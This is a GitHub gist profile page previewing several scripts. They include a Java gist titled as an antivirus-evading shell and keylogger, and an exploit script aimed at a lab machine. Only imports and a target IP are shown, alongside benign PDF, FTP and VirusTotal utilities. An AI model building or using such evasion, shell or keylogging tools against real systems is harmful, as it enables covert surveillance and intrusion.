Skip to content

Instantly share code, notes, and snippets.

View artikrh's full-sized avatar

Arti Karahoda artikrh

View GitHub Profile
@artikrh
artikrh / program.java
Created August 31, 2020 14:25
Evading AV with Network Sockets / Shell & Keylogger
import java.io.*;
import java.net.Socket;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Scanner;
import java.io.OutputStream;
import java.io.PrintWriter;
import java.util.logging.Level;
import org.jnativehook.GlobalScreen;
import org.jnativehook.NativeHookException;

Keybase proof

I hereby claim:

  • I am artikrh on github.
  • I am artikrh (https://keybase.io/artikrh) on keybase.
  • I have a public key ASDONbhnY1K6_Gm4pWKTaWnLYqtM0K7P-3tHPOJlN3dtwAo

To claim this, I am signing this object:

@artikrh
artikrh / pdfsplit.py
Last active March 16, 2019 00:02
Split multiple-page PDFs to single-page ones
import argparse
from sys import exit
from PyPDF2 import PdfFileWriter, PdfFileReader
def main():
try:
inputpdf = PdfFileReader(open(args.file, "rb"))
except:
print("[*] The given file is not in the PDF format!")
exit()
@artikrh
artikrh / ftpserver.py
Created December 21, 2018 13:14 — forked from ZoeS17/ftpserver.py
simple ftp server by python
#!/usr/bin/env python3
# coding: utf-8
import os,socket,threading,time
allow_delete = False
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 21
currdir=os.path.abspath('.')
class FTPserverThread(threading.Thread):
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from web3 import Web3
import json, hashlib
def enter_club():
# Store Ethereum contract address
with open("/home/bobby/projects/ChainsawClub/address.txt",'r') as f:
caddress = f.read().rstrip()
f.close()
@artikrh
artikrh / exploit.py
Last active December 2, 2019 15:38
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import json, subprocess
import netifaces as ni
from web3 import Web3
from sys import exit
import os, ftplib
# TODO: Modify accordingly
TARGET_IP = '10.10.10.142'
@artikrh
artikrh / virustotal.py
Created November 28, 2018 18:13
A simple python script which accepts an executable file as input argument and then communicates with VirusTotal API to check whether that file has been scanned (if yes, provide results from different AVs). Requires a valid VirusTotal API key to work.
#!/usr/bin/python
import sys,requests
import json,hashlib
def main():
file = sys.argv[1]
with open(file,"rb") as f:
bytes = f.read()
hash = hashlib.sha256(bytes).hexdigest();